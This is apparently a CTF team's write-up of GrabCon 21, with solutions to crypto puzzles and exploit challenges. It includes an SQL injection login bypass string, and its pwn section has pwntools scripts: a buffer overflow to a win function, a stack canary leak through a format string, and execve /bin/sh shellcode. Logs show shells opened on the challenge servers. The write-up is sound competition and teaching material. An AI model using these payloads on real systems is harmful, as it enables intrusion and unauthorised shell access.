GrabCon 21 - CTF Community

Misc

Welcome
50

GrabCON{welcome_to_grabcon_2021}

Eazy-Peazy

E4sy Pe4sy
100

Hack admin user!

Link

Author: r3curs1v3_pr0xy

' or 1=1;# '

GrabCON{E4sy_pe4sy_SQL_1nj3ct10n}

Crypto

Warm-up

Warm-up
50

Mukesh used to drink and then smoke 5 times a day. He is now suffering form cancer his drink was 64 rupees and 32 rupees cigarette that costs to cheap for him. And he has this much of cancer now.

Author: Offen5ive

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)&input=UzAxWlJFTlhVMU5KVmtoR1VWWktVa3BhUmtaTk1sTkxTVFZLVkVOV1UweExWbFpZUVZsTFZFbGFUa1ZWVmxSTlMwcElSa2MyVTFkS1ZrcEhWMDFMV0V0YVExVlZWRU5YVGxKT1JsTlZTMWRPVWtkR1MwMUVWVXMxUzBkWFZsTkxTMXBEV0ZGVVExUk9VbGxGVDFWVVRFMVNURlpEVFV4RlNrNU1SMWMwUTBsTFdWbEVRMVJEV0V0V01rWk5WakpXVGtKS1JrMVNTMDlNUWt0SFYwNUVXa3RLVjBVMFZsTk9UbEpUUlZkV1ZFdExTa3hXUjAxQ1VrbE9URWRYTlVOUVMwNVhSa1ZTUTFkTFdraEZTVlZhVWs5Q1RVWkZNakpYUzFaS1ZFTlhVMHRMV2xaV1ZWSlRWVWRHVEVaTFZrTkdSMFpJVlRSU1UxWlFSa2RYV1ZSVFRVdE9WbFJMVkV0VFIwWlNWRUZWU2xGTlVrZEdTVlpVVFVzMVNrWk5WRXhhUzFwV1dFbFdNazVPVGt4Rk5GWlVTMHBLVEZaSlVreFJTbFpLUjFkTlMxUkxUVmxFVTFSRFZrNU9Na1ZSVmpKWFNscExSazFXVEZWS1RrcFVRMVZUUlV0YVYwVTBWakpUUjBKT1JrbFZVMWROVWt4R1RWSk1WVXBTU2xkWE5rTllTMGxaVmxWU1ExUkhRVmxWVDFaRFJrMVNUVVUwVmt0UFMwWktWRU5UVTBWTFdsZEdUVlpMVWtkR1UwVTJWa3hNVFZKTlZrdE5TMWROUmt0WFYwOUxSRXRGV1VaVlZVTldUazR5UlZGVldsSlBRa2RHVFZKTFQwczFTMVJCTTBOTlMwcFdXRkZUUTFoTFdsTkZTVlpNVEUxU1JGWkpNakl5U2xKTVIxZFVVMGhMU1ZsV1ZWTXlWMDVPVTBaSFZUTXlTa3BHUmtzeU0wVkxWa2xXVFZWVFZVdFNTMWhKVkRKWFIwSk9SazFXVERKS1NrMUdSVTFETWt0T1RFVkxVbE5YUzA1WFJVMVZRMUpPVGxORlQxWkVNa3BHTlVaUFZreE1SMFpLVkVGWFUwOUxXVmxWTkZKVFZFZEdXVVZKVmxKUlRsSktSVEl5V2xaS05VdEhWMDVMUjB0V1RFWlZWa05YVGswMFZVZFZNMHhNU2taR1N6SXpXVXRLU2xkWFUxTk1TMGxaVjBkTlMxSkhSa3BGV1ZaTVRFcGFUVlpMVmxOUFNsSkxWRUUxUTFOTE5VdFdSVlpEVjB0V1NFWk5WVkpSU1ZWWlJrMHlNa2RMV2twWFZWWlRTa3RhUzBSQlQwdFJTMUZaUkZOVlExSklWVFpSUFQwOVBRPT0K

GrabCON{dayuum_s0n!}

Pokeball RSA

Poke Ball RSA
100

Eevee is in trouble. Help him as he tries to evolve into Sylveon in the Real Stormy Arena.

Author: RDxR10

n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818

#https://pycryptodome.readthedocs.io/en/latest/src/public_key/rsa.html

N = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
E = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818
print((E,N))

from sympy.core import Rational
from sympy.ntheory.continued_fraction import continued_fraction_convergents
from sympy.ntheory.continued_fraction import continued_fraction_iterator
from Crypto.PublicKey import RSA
import binascii


it = continued_fraction_convergents(continued_fraction_iterator(Rational(E,N)))  


res=[]
for i in range(1000):
	elt = next(it)
	if str(elt).find("/")>-1:
		d=int(str(elt).split("/")[1])
		print(".",sep="",end="",flush=True)
		try:
			key = RSA.construct((N,E,d))
			print("================")
			print(d)
			break
		except:
			pass
pt=hex(pow(c,d,N))
print(pt)
print(binascii.unhexlify(pt[2:]))

b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329'

import gmpy
from Crypto.Util.number import *

e=2
ct=9019127052844164572606928250741960583163943438936945828390420331200602392329
ct= gmpy.root(ct,e)[0]

import binascii
print(binascii.unhexlify(hex(ct)[2:]))

Not RSA - First Blood

Not RSA
440

Whatever it is, it's not RSA.

Author: RDxR10

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

from math import sqrt
import random
from Crypto.Util.number import bytes_to_long,long_to_bytes


N = 2433984714450860961589027518159810370561856716063956157321856705975948489337570445957833120668443867975490363019335530343179129689501017626817947777263721
c = 1378297008929492435762470180953416238081302819750327089183697281160938504327642742017058360280755400054663296904328307673692314945545918393502459480987913
a = int(sqrt(N) + 1)
b = random.randint(0,9999999999)

#flag = b"REDACTED"
#m = bytes_to_long(flag)

#c = ((a**m)*(b**(a-1)))%((a-1)*(a-1))


p=194545307101606186694882845905355574989
q=253593527157826835431576067999755840801
r=pow(c,pow(p*q,-1,(p-1)*(q-1)),p*q)
m=((((c*pow(r,-p*q,N))-1)%N)//(p*q))%N
print(hex(m))
print(long_to_bytes(m))

#GrabCON{i75_p4ill13r_f0lks}

GrabCON{i75_p4ill13r_f0lks}

Old Monk's Password

Old Monk's Password
150

Monk: What's this man? One password, different encoded forms?

Author: RDxR10

enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>'
enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>'
enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;'

import codecs
import random

class pass_w:
    x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"
    def encode(self, text, i = -1):
        

        if i < 0 or i > len(self.x) + 1:
            i = random.randint(0, len(self.x) + 1)

        out = chr(i)
        for c in text:
            out += chr(ord(c) ^ ord(self.x[i]))
            i = (i + 1)%79                 

        return codecs.encode(out)
    

#y = pass_w()
#print(y.encode("REDACTED"))


#Enclose password within GrabCON{}

def decode(enc):
    x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"
    i = enc[0]
    print(i)
    out=""
    for c in enc[1:]:
        out += chr(c ^ ord(x[i]))
        i = (i + 1)%79   
        print(out)


print(decode(enc))

GrabCON{817letmein40986728ilikeapples}

Pwn

Easy bin

from pwn import *

# Read Service
proc = ELF("./easybin")
print(proc.symbols)


# magie
magie = p64(proc.symbols["vuln"])

for i in range(56,57):

	# lockpick
	print(i)
	pl=b"a"*i+magie
	print(pl)
	# Execute
	try:
		exec=process("./easybin")
		exec.sendline(pl)
		#print(exec.read(1024))
		
		exec.interactive()
		#print(exec.poll())
		exec.close()
	except:
		pass


exploit=True
if exploit:
	conn = remote('35.205.161.145','49153')
	#pl=b"a"*i+magie
	#print(conn.recv())
	conn.sendline(pl)
	conn.interactive()
	conn.close()

[*] '/home/kali/Desktop/grabcon/pwn/easybin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
{'__abi_tag': 4195228, 'deregister_tm_clones': 4198560, 'register_tm_clones': 4198608, '__do_global_dtors_aux': 4198672, 'completed.0': 4210752, '__do_global_dtors_aux_fini_array_entry': 4210184, 'frame_dummy': 4198720, '__frame_dummy_init_array_entry': 4210176, '__FRAME_END__': 4202884, '__init_array_end': 4210184, '_DYNAMIC': 4210192, '__init_array_start': 4210176, '__GNU_EH_FRAME_HDR': 4202552, '_GLOBAL_OFFSET_TABLE_': 4210688, '__libc_csu_fini': 4198928, 'data_start': 4210736, 'vuln': 4198726, '_edata': 4210752, '_fini': 4198936, '__data_start': 4210736, '__dso_handle': 4210744, '_IO_stdin_used': 4202496, '__libc_csu_init': 4198816, '_end': 4210760, '_dl_relocate_static_pie': 4198544, '_start': 4198496, '__bss_start': 4210752, 'main': 4198762, '__TMC_END__': 4210752, '_init': 4198400, 'printf': 4198448, 'plt.printf': 4198448, 'execve': 4198464, 'plt.execve': 4198464, 'gets': 4198480, 'plt.gets': 4198480, '_ITM_deregisterTMCloneTable': 4210656, 'got._ITM_deregisterTMCloneTable': 4210656, '__libc_start_main': 4210664, 'got.__libc_start_main': 4210664, '__gmon_start__': 4210672, 'got.__gmon_start__': 4210672, '_ITM_registerTMCloneTable': 4210680, 'got._ITM_registerTMCloneTable': 4210680, 'got.printf': 4210712, 'got.execve': 4210720, 'got.gets': 4210728}
56
b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaF\x11@\x00\x00\x00\x00\x00'
[+] Starting local process './easybin': pid 37201
[*] Switching to interactive mode
$ exit
[*] Got EOF while reading in interactive
$ quit
[*] Process './easybin' stopped with exit code 0 (pid 37201)
[*] Got EOF while sending in interactive
[+] Opening connection to 35.205.161.145 on port 49153: Done
[*] Switching to interactive mode
$ ls
easybin
flag.txt
run.sh
ynetd
$ cat flag.txt
GrabCON{w3ll_Y0u_Kn0w_Basics!!!}

Can you ?

leak the canary ?

from pwn import *
import time

# Read Service
proc = ELF("./cancancan")
print(proc.symbols)


# magie
magie = p32(proc.symbols["win"])


for i in range(25,26):

	# Iteration
	print(i)

	# Execute
	try:
		exec=process("./cancancan")
		exec.sendline(b"%31$x")
		canary = int(b"0x"+exec.recv(1024).split(b"\n")[1],16)
		pl = b"aaaa"*i+p32(canary)+magie*4
		exec.sendline(pl)
		
		exec.interactive()
		#print(exec.poll())
		exec.close()
	except:
		pass


exploit=True
if exploit:
	conn = remote('35.246.42.94','31337')
	conn.sendline(b"%31$x")
	time.sleep(1)
	canary = int(b"0x"+conn.recv(1024).split(b"\n")[1],16)
	print(canary)
	pl = b"aaaa"*i+p32(canary)+magie*4
	conn.sendline(pl)
	conn.interactive()
	conn.close()
	pass

# GrabCON{Byp4ss_can4ry_1s_fun!}

GrabCON{Byp4ss_can4ry_1s_fun!}

Pwn CTF

Shellcode on the stack,

from pwn import *
import time


for i in range(302,303):
	print(i)
	conn = remote("35.246.42.94","1337")#process("./pwn2")
	time.sleep(2)
	stack = int(conn.recv().split(b"\n")[1].split(b" ")[2][:-1],16)
	print(hex(stack))
	#pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x40\x89\xc3\xcd\x80"#b"\x90"*100+b"\x50\x48\x31\xD2\x48\x31\xF6\x48\xBB\x6D\x20\x2B\x2C\x6D\x6D\x31\x2A\x48\xB8\x42\x42\x42\x42\x42\x42\x42\x42\x48\x31\xC3\x53\x54\x5F\x48\x31\xC0\xB0\x3B\x0F\x05"
	pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
	conn.sendline(pl)
	time.sleep(1)
	try:
		#print(conn.recv())
		conn.interactive()
	except:
		conn.close()
	conn.close()
	input()
	#conn.interactive()

kali@kali:~/Desktop/grabcon/pwn$ python3 blacklisted.py 
302
[+] Opening connection to 35.246.42.94 on port 1337: Done
0xffe7d4be
[*] Switching to interactive mode
$ 
$ ls
bin
dev
flag.txt
lib
lib32
lib64
pwn2
$ cat flag.txt
GrabCON{Y0U_g0t_Sh3ll_B4asics}
$

GrabCON{Y0U_g0t_Sh3ll_B4asics}

That's all folks - Electro

GrabCon 21 - CTF Community

Misc

Eazy-Peazy

Crypto

Warm-up

Pokeball RSA

Not RSA - First Blood

Old Monk's Password

Pwn

Easy bin

Can you ?

Pwn CTF

Read more

Cyber Grabs CTF 0x03 Junior - FlagPoisoning

DG'hAck 2021 - Electro

YauzaCTF 21 - Crypto Challenges

Redpwn 2021 - DeepWater